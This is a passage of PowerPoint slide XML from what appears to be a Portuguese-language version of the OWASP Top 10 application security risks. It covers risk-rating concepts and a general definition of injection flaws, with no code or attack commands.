                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="70" name="Table 69"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1336385307"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="3876040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                        <a:t>O que são Riscos de Segurança em Aplicações</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-lt"/>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solidFill>
                      <a:srgbClr val="D9EAD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="3492909">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Os atacantes podem,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> potencialmente, usar vários caminhos diferentes através da sua aplicação para causar danos ao seu negócio ou organização.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="pt-PT" sz="1000" dirty="0" smtClean="0"/>
                        <a:t>Cada um desses caminhos representa um risco que pode, ou não, ser grave o suficiente para justificar a sua atenção</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="pt-BR" sz="1000" b="0" dirty="0" smtClean="0"/>
                        <a:t>Às vezes, esses caminhos são triviais para encontrar e explorar, e em outras, são extremamente difíceis. Da mesma forma, o dano causado pode ter nenhuma consequência, ou pode acabar com o seu negócio. Para determinar o risco para a sua organização, você pode avaliar a probabilidade associada a cada agente de ameaça, vetor de ataque, vulnerabilidade de segurança e combiná-la com uma estimativa dos impactos técnico e no negócio da sua empresa. Juntos, esses fatores determinam o risco total.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>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tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="72" name="Table 71"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4225861803"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="114295" y="6172200"/>
          <a:ext cx="4305304" cy="1188720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{B301B821-A1FF-4177-AEE7-76D212191A09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="620889"/>
                <a:gridCol w="636412"/>
                <a:gridCol w="914400"/>
                <a:gridCol w="914400"/>
                <a:gridCol w="609600"/>
                <a:gridCol w="609603"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Agentes de Ameaça</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900"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900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Vetores de Ataque</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900"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900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prevalência da Vulnerabilidade</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900"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solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detecção Vulnerabilidade</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900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impactos</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Técnicos</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRP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900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impactos no Negócio</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4">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="152400">
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico da Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="8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900" dirty="0" smtClean="0"/>
                        <a:t>Fácil</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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Generalizada</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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Fácil</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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Severo</a:t>
                      </a:r>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0000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Específico do Negócio/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Aplicação</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="8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r h="152400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" smtClean="0"/>
                        <a:t>Média</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="90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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Comum</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="90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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Média</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="90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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Moderado</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="90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B200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="152400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Difícil</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="90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en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Rara</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="90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en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Difícil</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="90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en-US" sz="900" dirty="0" smtClean="0"/>
                        <a:t>Pequeno</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Imagem 1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2857" y="2044253"/>
            <a:ext cx="6761296" cy="2245522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1081540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609600" y="990600"/>
            <a:ext cx="8153400" cy="8001000"/>
            <a:chOff x="-609600" y="990600"/>
            <a:chExt cx="8153400" cy="8001000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Rectangle 2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-609600" y="990600"/>
              <a:ext cx="8153400" cy="8001000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="1071787"/>
              <a:ext cx="5218177" cy="611796"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX1" fmla="*/ 509827 w 611795"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX2" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY2" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX3" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY3" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX4" fmla="*/ 611795 w 611795"/>
                <a:gd name="connsiteY4" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY5" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY6" fmla="*/ 5218176 h 5218176"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 611795"/>
                <a:gd name="connsiteY7" fmla="*/ 101968 h 5218176"/>
                <a:gd name="connsiteX8" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 5218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1795" h="5218176">
                  <a:moveTo>
                    <a:pt x="611795" y="869717"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="611795" y="4348459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="611795" y="4828785"/>
                    <a:pt x="606442" y="5218172"/>
                    <a:pt x="599840" y="5218172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5218172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599840" y="4"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="606442" y="4"/>
                    <a:pt x="611795" y="389391"/>
                    <a:pt x="611795" y="869717"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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1" rIns="66441" bIns="48154" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="91440" lvl="1" algn="l" defTabSz="444500">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>As falhas de Injeção, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>tais como injeção</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>SQL, de SO</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>(Sistema Operacional) e </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>de </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>LDAP, ocorrem quando dados não confiavéis são enviados para um interpretador como parte de um comando ou consulta. Os dados manipulados pelo atacante </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0"/>
                <a:t>podem iludir o interpretador para que este execute comandos indesejados ou permita o acesso a dados não autorizados.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="151386" y="995312"/>
              <a:ext cx="1413251" cy="764744"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY0" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX1" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX2" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 764744"/>
                <a:gd name="connsiteX3" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY3" fmla="*/ 127460 h 764744"/>
                <a:gd name="connsiteX4" fmla="*/ 1413251 w 1413251"/>
                <a:gd name="connsiteY4" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX5" fmla="*/ 1285791 w 1413251"/>
                <a:gd name="connsiteY5" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX6" fmla="*/ 127460 w 1413251"/>
                <a:gd name="connsiteY6" fmla="*/ 764744 h 764744"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY7" fmla="*/ 637284 h 764744"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1413251"/>
                <a:gd name="connsiteY8" fmla="*/ 127460 h 764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3251" h="764744">
                  <a:moveTo>
                    <a:pt x="0" y="127460"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="57066"/>
                    <a:pt x="57066" y="0"/>
                    <a:pt x="127460" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1285791" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1356185" y="0"/>
                    <a:pt x="1413251" y="57066"/>
                    <a:pt x="1413251" y="127460"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1413251" y="637284"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1413251" y="707678"/>
                    <a:pt x="1356185" y="764744"/>
                    <a:pt x="1285791" y="764744"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="127460" y="764744"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57066" y="764744"/>
                    <a:pt x="0" y="707678"/>
                    <a:pt x="0" y="637284"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="12746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a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
                <a:t>A1 – Injeção</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1564637" y="1874768"/>
              <a:ext cx="5218177" cy="611796"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 101968 w 611795"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX1" fmla="*/ 509827 w 611795"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 5218176"/>
                <a:gd name="connsiteX2" fmla="*/ 611795 w 611795"/>
